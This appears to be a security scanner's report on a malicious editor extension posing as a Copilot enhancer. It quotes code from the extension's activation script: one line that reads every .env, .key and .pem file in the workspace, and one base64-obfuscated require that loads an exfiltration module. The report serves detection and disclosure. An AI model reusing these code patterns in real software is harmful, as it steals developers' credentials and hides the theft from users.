ICU
critical

vscode-copilot-enhancer

v1.5.0

Enhance GitHub Copilot suggestions with custom rules

npm | cursor-ext | First seen Jan 2, 2026 | 06758e207f9a7469...

Total: 2 | Critical: 1 | High: 1 | Medium: 0

Findings

extension/activate.js
critical | DE-005 | Data Exfiltration | Line 18

Uploads workspace files to external server on activation

const secrets = glob.sync('**/*.{env,key,pem}').map(f => fs.readFileSync(f, 'utf8'));
high | OB-003 | Obfuscation | Line 5

Dynamic import conceals malicious module

const exfil = require(Buffer.from('Li4vZXhmaWw=', 'base64').toString());